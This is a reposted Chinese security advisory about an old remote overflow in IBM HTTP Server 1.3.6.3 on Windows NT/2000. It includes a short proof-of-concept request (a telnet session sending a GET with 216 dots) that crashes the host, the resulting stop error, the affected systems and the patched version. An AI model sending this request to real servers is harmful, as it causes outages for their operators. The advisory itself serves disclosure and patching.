IBM HTTP Server 远程溢出漏洞
导读:收集整理的这篇文章主要介绍了IBM HTTP Server 远程溢出漏洞,觉得挺不错的,现在分享给大家,也给大家做个参考。 涉及程序: @H_777_0@GET 描述: 通过提交超长的G...
收集整理的这篇文章主要介绍了IBM HTTP Server 远程溢出漏洞,觉得挺不错的,现在分享给大家,也给大家做个参考。 涉及程序: @H_777_0@GET 描述:
通过提交超长的GET请求导致IBM HTTP Server远程溢出
详细:
IBM 的 HTTP 服务器是一个 web 服务器。在 Windows NT 使用的版本中存在拒绝服务的漏洞。
如果提交一个超过219个字符的 GET 请求,将导致服务器停止响应,并报错。要恢复服务正常工作需要重新启动应用程序。成功的利用该漏洞,攻击者可在受害的主机上执行任何代码。(但这还未得到完全证实。)
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
$ telnet target 80
GET /......(216个".")aaa HTTP/1.0
则系统会报告下列错误信息:
***STOP:0x0000001e(0X00000005,0X804B3A51,0X00000000,0X00000000)KMODE_EXCEPTI
ON_NOT_HANDLED.
***Address 804B3A51 base at 80400000,Datastamp 384D9B17-ntoskrnl.exe
注意:目标主机运行在Windows 2000下。
受影响的系统
IBM HTTP Server 1.3.6.3
- TurboLinux Turbo Linux 3.0.1
- Sun solaris 2.6
- S.u.S.E. Linux 6.1
- S.u.S.E. Linux 6.0
- redhat Linux 6.0 sparc
- RedHat Linux 5.2 sparc
- Microsoft Windows NT 4.0
- IBM aiX 4.2.1
- Caldera OPEnLinux 2.2
解决方案:
IBM 已经在 1.3.12 版本中解决了此问题,下载地址:
http://www-4.ibm.COM/Software/webservers/httpservers/download.htML
声明:本文内容由网友自发贡献,本站不承担相应法律责任。对本内容有异议或投诉,请联系2913721942#qq.com核实处理,我们将尽快回复您,谢谢合作!
若转载请注明出处: IBM HTTP Server 远程溢出漏洞
本文地址: https://pptw.com/jishu/604465.html
